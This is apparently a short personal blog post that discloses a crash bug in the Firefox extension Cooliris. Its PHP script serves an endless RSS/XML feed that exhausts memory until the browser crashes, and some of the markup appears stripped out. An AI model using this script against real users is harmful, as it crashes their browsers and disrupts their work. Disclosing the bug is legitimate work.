So while I was playing around and testing for some project, I noticed that the Firefox extension Cooliris seems to have a strange algorithm to parse xml files, like those you might want to link as RSS Feed.
I simply wrote a little PHP script which generates and endlessly long XML file. Watch your RAM usage, you will notice Firefox eats it up very fast when trying to parse all the XML data. Until it just crashes. :)
echo ('
bye ffox
http://dsorg.org/
Twart.
');
if($_GET['rss']=='true') {
while(true) {
echo "
sum title
sumfile
random1
";
}
} else {
echo ('
type="application/rss+xml" title="" id="gallery" />
watch your ram ;)');
}
?>